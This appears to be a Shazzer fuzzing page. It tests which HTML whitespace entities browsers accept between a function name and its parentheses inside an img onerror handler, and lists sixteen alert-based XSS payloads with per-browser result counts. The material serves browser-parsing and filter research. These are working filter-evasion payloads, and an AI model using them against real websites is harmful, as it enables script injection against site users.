Entities allowed between function calls
⚠ Browser differences
This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created byhackvertor
Created Jun 29, 2024
Updated May 27, 2025
Detecting browser...
CategoryEntity Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml_entities
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">Sample payloads
<img src=data: onerror="alert ('&emsp13;')"><img src=data: onerror="alert ('&emsp14;')"><img src=data: onerror="alert ('&emsp;')"><img src=data: onerror="alert ('&ensp;')"><img src=data: onerror="alert ('&hairsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert
('&NewLine;')"><img src=data: onerror="alert ('&NonBreakingSpace;')"><img src=data: onerror="alert ('&numsp;')"><img src=data: onerror="alert ('&puncsp;')"><img src=data: onerror="alert	('&Tab;')"><img src=data: onerror="alert  ('&ThickSpace;')"><img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert ('&VeryThinSpace;')">Fuzz results
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 16 results
Loading...
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated
Wed Jan 28 2026
Found 16 results
Loading...
Firefox 147.0 desktop Linux
Updated
Sun Feb 01 2026
Found 16 results
Loading...
Firefox 127.0 desktop macOS 10.15older version
Updated
Sat Jun 29 2024
Found 4 results
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 16 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated
Sun Jun 30 2024
Found 6 results
Loading...
Safari 17.4 desktop macOS 10.15.7older version
Updated
Sat Jun 29 2024
Found 2 results
Loading...